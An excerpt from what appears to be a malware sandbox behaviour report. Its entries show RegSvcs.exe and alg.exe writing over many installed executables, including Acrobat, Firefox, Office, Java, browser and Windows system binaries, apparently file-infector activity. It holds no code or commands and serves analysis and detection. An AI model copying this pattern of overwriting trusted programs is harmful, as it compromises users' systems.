              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\vds.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\snmptrap.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\Spectrum.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\Locator.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Program Files\7-Zip\7z.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\AppVClient.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\msiexec.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
